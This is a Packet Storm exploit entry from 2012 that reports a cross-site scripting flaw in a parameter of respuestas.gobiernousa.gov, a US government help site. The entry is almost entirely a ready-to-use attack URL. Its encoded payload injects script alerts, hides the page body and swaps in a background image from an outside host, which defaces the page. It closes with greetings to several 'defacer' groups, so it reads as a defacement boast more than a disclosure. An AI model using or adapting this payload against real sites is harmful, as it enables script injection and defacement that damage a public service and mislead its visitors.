Respuestas.gobiernousa.gov Cross Site Scripting

2012-03-29T00:00:00
ID PACKETSTORM:111282
Type packetstorm
Reporter Ryuzaki Lawlet
Modified 2012-03-29T00:00:00

Description

                                        
                                            `  
# Exploit Title: Respuestas.gobiernousa.gov Cross Site Scripting  
# Google Dork: -  
# Date: 26/3/2012 3:15 AM (Malaysia)  
# Author: Ryuzaki Lawlet  
# Blog: http://justryuz.blogspot.com  
# Tested on: Linux (OSHIRIX)  
# CVE : XSS  
  
######Vulnerable########  
  
Vulnerable : http://respuestas.gobiernousa.gov/system/selfservice.controller?CONFIGURATION=1001&PARTITION_ID=1&CMD=VIEW_ARTICLE&ARTICLE_ID=  
  
######Live Preview########  
  
Sites:  
http://respuestas.gobiernousa.gov/system/selfservice.controller?CONFIGURATION=1001&PARTITION_ID=1&CMD=VIEW_ARTICLE&ARTICLE_ID=%20wo.0t??%20by%20Ryuzaki%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2  
0%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22wo.0t??%20by%20Ryuzaki%22%29%3C/script%3E%3Cscript%3Ealert%28%22http://justryuz.blogspot.com%22%29%3C/script%3E%3Cscript%3Ealert%28%22Cyb3rSec%20Crew%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28https://fbcdn-profile-a.akamaihd.net/hprofile-ak-snc4/277062_207390472645570_423082005_n.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%0B%0Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3C/div%3E&USERTYPE=1#185  
  
######Preview########  
  
Screen shot  
http://4.bp.blogspot.com/-pwDwyG0SjYI/T29ztRSjbSI/AAAAAAAAAlM/C8Hna-Z2Hh0/s1600/xssb.png  
  
  
######Credit########  
  
Antuwebhunt3r| Md Lothdh | Ben CyberSEC | Misa CyberSEC | Sbkiller CyberSEC | Xay CyberSEC | Kejung$ CyberSEC | Biang Rusuh | Afnum vvip | HambaMalam | shah RC | Cak vvip | Lod vvip | Fakyu Tuyu | Alex John NEC | Dark Angel NEC | Cyg Selalu | chliz Aceh | Breackerz Code | Dboyz vvip | AgoenkJR | Misz Nadea | Lone Ranger vvip | Nick Keluang Johor | bl4ckm4gicx NEC | Pak Kordi NEC | b0ogle | Ana dira | pamy | cik din | Jack RC | Thaqif CyberSEC | Hayate DevilSec | KiSSierra | Mike | Syakiller | Hidden Pain | Gilang | MagmaCode RC | MASOKISME and all member | Mambang Oshirix Team | CyberSEC | RileksCrew | Newbie3vilc063s | h3x4 Crew | T3D Hackers | Cyber 4rmy | Indonesia Defacer | Turki Defacer | Pakistan Defacer & Gaza Defacer  
  
Source: http://justryuz.blogspot.com/2012/03/wo0t-respuestasgobiernousagov-cross.html  
`